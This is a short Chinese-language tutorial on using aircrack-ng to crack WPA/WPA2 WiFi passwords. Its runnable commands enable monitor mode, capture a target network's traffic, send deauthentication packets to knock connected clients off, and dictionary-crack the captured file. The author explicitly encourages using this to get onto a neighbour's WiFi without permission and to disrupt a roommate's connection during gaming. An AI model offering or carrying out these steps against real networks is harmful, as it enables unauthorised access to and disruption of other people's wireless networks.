aircrack-ng的使用
aircrack-ng是什么
Aircrack-ng是一个与802.11标准的无线网络分析有关的安全套件。
主要功能:网络侦测,数据包嗅探,WEP和WPA/WPA2-PSK破解。
Aircrack-ng可以工作在任何支持监听模式的无线网卡上(设备列表请参阅其官方网站)并嗅探802.11a,802.11b,802.11g的数据
aircrack-ng 套件包含有:
使用aircrack-ng破解wifi
主要就是抓包然后用字典破解,要是玩的话,设一个弱一点的密码节省时间,要想蹭邻居家的网最好准备一个强一点的字典,不然会慢到崩溃。
准备
- 无线网卡 注:要是想同时上网的话,准备两个无线网卡
- 安装aircrack-ng的linux系统
- 字典
步骤
- 开启无线网卡监听模式
1
$ airmon-ng start wlp3s0
- 扫描目标wifi
1
$ airodump-ng wlp3s0mon
CH(信道)
加密方式:WPA2 - 模拟WIFI信号
1
$ airodump-ng --ivs -w wifi-pass --bssid wifi的MAC地址 -c 1 wlp3s0mon
–ivs :指定生成文件的格式
-w :指定文件的名称
–bssid :目标AP的MAC地址
-c :指定我们模拟的WiFi的信道 - 攻击指定目标
使用另一个终端执行以下命令(攻击的时候目标不能使用wifi,建议在室友玩游戏太吵的时候食用)1
$ aireplay-ng -0 20 -a 路由器的MAC地址 -c 目标的MAC地址 wlp3s0mon
-0:发送数据包的数量
-a:指定目标AP的MAC地址
-c:目标用户的MAC地址(正在使用wifi的设备)
- 得到密码文件后破解
这个靠运气,不行的话增加数据包的发送数量或者等一段时间在发送,说不定就碰上目标正在使用wifi的时候呢
能不能抓到相关文件看的是目标用户是否活跃,选择目标的时候优先选择数据流量大信号强的。1
$ aircrack-ng wifi-pass-01.ivs -w 字典路径
